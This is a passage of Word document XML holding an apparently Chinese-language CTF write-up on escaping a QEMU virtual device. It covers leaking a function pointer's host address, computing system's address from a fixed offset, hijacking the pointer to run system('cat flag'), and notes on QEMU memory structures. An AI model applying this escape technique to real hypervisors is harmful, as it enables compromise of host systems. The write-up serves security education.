      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其中，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中额外限制了opaque-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> % 0x1000 == 0，即访问的物理地址要与物</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">理页对齐。为了绕过该限制，exp中定义了一个0x1000长度的buffer，取buffer中对齐的合法地址传递给 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。这样，就能成功把p的值写入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>opaque_dst_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，完成p的</w:t>
      </w:r>
      <w:r w:rsidR="00971D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00971D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00971D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CC6230" w14:textId="77777777" w:rsidR="000E36D1" w:rsidRPr="00971D61" w:rsidRDefault="000E36D1" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584606B8" w14:textId="09415C5C" w:rsidR="000E36D1" w:rsidRDefault="000E36D1" w:rsidP="000E36D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>计算 system 的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5230D3" w14:textId="7C4224F1" w:rsidR="000E36D1" w:rsidRDefault="000E36D1" w:rsidP="008E0FF8">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在elf进程中，system的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpu_physical_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的函数地址有固定</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>偏移</w:t>
      </w:r>
      <w:r w:rsidR="008E0FF8" w:rsidRPr="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。首先在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0FF8" w:rsidRPr="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ida</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0FF8" w:rsidRPr="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中找到两个地址，计算差值，最后在exp中把泄露的函数指针加上差值，即可</w:t>
      </w:r>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算出</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程中system的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。可以将该地址覆盖函数指针p，从而在访问内存时调用system函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67843404" w14:textId="03039F87" w:rsidR="008E0FF8" w:rsidRDefault="00FE0B7E" w:rsidP="00FE0B7E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="288D1FAE" wp14:editId="3037D6ED">
            <wp:extent cx="4902835" cy="1010553"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9042240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224027" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4909809" cy="1011990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6B8E08" w14:textId="09ECCE71" w:rsidR="008E0FF8" w:rsidRPr="008E0FF8" w:rsidRDefault="008E0FF8" w:rsidP="008E0FF8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>的对应关系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54299821" w14:textId="51023012" w:rsidR="00971D61" w:rsidRDefault="00971D61" w:rsidP="00971D61">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现在我们有了 system 的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为了运行system(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cat flag</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008E0FF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)，我们还需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">在参数传入命令字符串的 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址。有两种思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BBE3DD" w14:textId="7A2D313F" w:rsidR="00971D61" w:rsidRDefault="00971D61" w:rsidP="00971D61">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">将 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 放置在 guest 内存空间中，然后找到 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0 对应的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>起始地址，计算出</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20582D85" w14:textId="3C839B4C" w:rsidR="00971D61" w:rsidRDefault="00971D61" w:rsidP="00971D61">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，再找到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的起始 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A798616" w14:textId="4354F7CE" w:rsidR="00971D61" w:rsidRPr="00971D61" w:rsidRDefault="00971D61" w:rsidP="00971D61">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其中，第一种思路需要泄露</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的起始地址，第二种思路需要找到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的堆中，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3255273E" w14:textId="3592CC5F" w:rsidR="00E920EB" w:rsidRPr="00971D61" w:rsidRDefault="00E920EB" w:rsidP="00E920EB"/>
    <w:p w14:paraId="07CF3AC3" w14:textId="209E5620" w:rsidR="00E920EB" w:rsidRPr="008E0FF8" w:rsidRDefault="00E920EB" w:rsidP="00E920EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>找到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的对应关系 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 失败尝试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B979969" w14:textId="3ACFA5FA" w:rsidR="00971D61" w:rsidRDefault="00E920EB" w:rsidP="00971D61">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为了稳定地进行攻击，我们首先尝试寻找</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>全局变量中的内存管理结构体。我们学习了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AddressSpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00971D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00971D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MemoryRegion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00971D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00971D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RAMBlock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00971D61">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的概念，小结如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7700A" w14:textId="792E09FD" w:rsidR="00452BB1" w:rsidRDefault="00971D61" w:rsidP="00971D61">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AdressSpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452BB1" w:rsidRPr="00452BB1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示 Guest 视角不同类型的地址空间</w:t>
      </w:r>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00452BB1" w:rsidRPr="00452BB1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在 x86 下只有两种</w:t>
      </w:r>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址空间，分别是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452BB1" w:rsidRPr="00452BB1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>address_space_memory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452BB1" w:rsidRPr="00452BB1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452BB1" w:rsidRPr="00452BB1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>address_space_io</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452BB1" w:rsidRPr="00452BB1">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>程序中，他们分别对应了两个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AddressSpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型的全局指针变量</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>address_space_memory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>address_space_io</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A7557" w14:textId="4E58404C" w:rsidR="00971D61" w:rsidRPr="00452BB1" w:rsidRDefault="00452BB1" w:rsidP="00452BB1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BC51DFA" wp14:editId="541BF9BA">
            <wp:extent cx="3185436" cy="1508891"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5649893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989377" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3185436" cy="1508891"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E10B6A" w14:textId="394EEA9F" w:rsidR="00CA1641" w:rsidRDefault="00452BB1" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
